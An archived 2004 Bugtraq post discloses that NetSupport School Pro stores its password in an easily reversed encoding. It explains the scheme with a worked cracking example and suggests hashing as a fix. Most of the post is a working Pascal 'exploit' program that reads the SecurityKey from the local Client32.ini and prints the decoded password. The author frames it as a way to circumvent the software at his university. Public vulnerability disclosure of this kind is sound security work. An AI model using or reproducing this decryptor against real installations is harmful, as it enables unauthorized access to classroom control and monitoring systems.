lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY1-F55Faatao8KK8Z000105a1@hotmail.com>
Date: Fri, 26 Mar 2004 08:54:41 -0500
From: "spiffomatic 64" <spiffomatic64@...mail.com>
To: bugtraq@...urityfocus.com
Subject: NetSupport School Pro: Password Encryption Weaknesses


To the moderator, this is my first bugtraq posting, feel free to make any 
changes you feel nessessary to make this more helpful. Thank you very much

Vendor  : NetSupport
URL     : http://www.netsupport-inc.com/
Version : Invision NetSupport School Pro
Risk    : Password protection weakness

Description: NetSupport School, market leading training tool for the modern 
classroom featuring full student remote control, application & internet 
monitoring, customized student testing and more.

Password protection weakness: The password encryption method is a method 
which is easily reversed. The encryption method is as follows:
The letters are expressed using a hexadecimal type of system. Every letter 
is shown by two characters the first character can be any ascii character 
while the second is in a range from a-p. This works just like hex in that 
ap+1=ba. Its not case sensitive so that also makes it easier for kids to get 
passes. The characters start at EM. So A= EM B=EN and so on. Each letter is 
also added to by the number of letters in front of it. So the crypt of aa= 
EN9O while the crypt of aaa=EO9P>A. I can figure the routine used for the 
crypt of each colum though. Here is a reference for the letter a and its 
crypt of each colum EM, 9O, >a, BC, FE, :G, >I, BK, FM, :O. Based on this 
knowledge and the hex-esque characters, and the addition to each char based 
on the amount of letters in front of it, you can get the password from an 
encrypted one. An example of a cracked password: The crypt is “GC;H@KEO” GC 
-3 = FP (according to the hexish system) FP=T so the first letter is T. Take 
9O (known “a” for the 2nd column) and add the difference from a-t to it (19) 
and you get ;B add 2 to it (amount of letters in front of it) = ;D then 
subtract ;D from ;H you get 4 places. A+4 = E the second letter is “E” you 
continue to do this until you get the password “test”

Solution: based on my research this program uses a hash type validation 
method, so the quickest and most painless solution would be to use the md5 
routine for passwords.

Credits: Credits go to Drexel University, and Harry Hoffman because if they 
hadn’t have used this software I would have never had the urge to circumvent 
it ;)
As well as Mr. Flynn for teaching me pascal (even though its 20+ years old 
its still my favorite)




Spiffomatic64
Hacking is an art-form


Here is a program that will decrypt the password off of a machine with the 
software running:
(old school :-D its written in pascal)

program exploit;
uses crt;
var i,j,length,x,y,crazy:integer;
    passfile:text;
    line:string;
    password,p:array [1..100] of char;
    known,convert:array [1..26,1..3] of char;
    ch,tempx,tempy,key:char;

procedure conv;
begin
convert[1,1]:='E';
convert[1,2]:='M';
convert[1,3]:='A';
for i:=2 to 26 do begin
    if convert[i-1,2]='P' then begin
       convert[i,1]:=chr(ord(convert[i-1,1])+1);
       convert[i,2]:='A';
    end
    else begin
         convert[i,1]:=convert[i-1,1];
         convert[i,2]:=chr(ord(convert[i-1,2])+1);
    end;
    convert[i,3]:=chr(ord(convert[i-1,3])+1);
end;
end;

procedure hex(a,b:char; num:integer);
begin
if num>0 then begin
for i:=1 to num do begin
    if b='P' then begin
       b:='A';
       a:=chr(ord(a)+1);
    end else inc(b);
end;
end;
if num<0 then begin
for i:=-1 downto num do begin
    if b='A' then begin
       b:='P';
       a:=chr(ord(a)-1);
    end else dec(b);
end;
end;
tempx:=a;
tempy:=b;
end;

function compare(a,b:char):char;
begin
for i:=1 to 26 do begin
if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64);
end;
end;

function diff(a,b,c,d:char):integer;
var num1,num2,num3:integer;
begin
num1:=ord(a)*16+ord(b);
num2:=ord(c)*16+ord(d);
num2:=num2;
diff:=num2-num1;
end;


Begin
{get the hash from client32.ini}
clrscr;
Writeln(' _________________________________________________________');
Writeln('|NetSupport School Pro Password decryptor                 |');
Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');
Writeln('|and my wonderful fiance Halley                           |');
Writeln(' ---------------------------------------------------------');
Writeln('');
   assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini');
   reset (passfile);
   i:=0;
   while not eof(passfile) do
   begin
        line:='';
        while not EoLn(passfile) do
        begin
             Read(passfile, ch);
             line:=line+ch;
             if line='SecurityKey=' then begin
                while not eoln(passfile) do
                begin
                  inc(i);
                  read(passfile,ch);
                  password[i]:=ch;
                end;
                length:=i;
             end;
        end;
        readln(passfile,line);
   end;
   write('Hash: ');
   for i:=1 to length do write(password[i]);
writeln('');
{decrypt the hash}
conv;
known[1,1]:='E';
known[1,2]:='M';
known[2,1]:='9';
known[2,2]:='O';
known[3,1]:='>';
known[3,2]:='A';
known[4,1]:='B';
known[4,2]:='C';
known[5,1]:='F';
known[5,2]:='E';
known[6,1]:=':';
known[6,2]:='G';
known[7,1]:='>';
known[7,2]:='I';
known[8,1]:='B';
known[8,2]:='K';
known[9,1]:='F';
known[9,2]:='M';
known[10,1]:=':';
known[10,2]:='O';
known[11,1]:='?';
known[11,2]:='A';
known[12,1]:='C';
known[12,2]:='C';
known[13,1]:='G';
known[13,2]:='E';
known[14,1]:=';';
known[14,2]:='G';
known[15,1]:='?';
known[15,2]:='I';
{get the first char}
for i:=1 to round(length/2) do p[i]:=chr(65);
for x:=1 to round(length/2) do begin
    crazy:=0;
    crazy:=-(round(length/2))+x;
    for y:=1 to round(length/2) do crazy:=crazy-(ord(p[y])-65);
    hex(password[x*2-1],password[x*2],crazy);
    p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65);
end;
writeln('');
write('Password: ');
for i:=1 to round(length/2) do begin
    write(p[i]);
end;
readkey;

end.

_________________________________________________________________
Get tax tips, tools and access to IRS forms – all in one place at MSN Money! 
http://moneycentral.msn.com/tax/home.asp



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ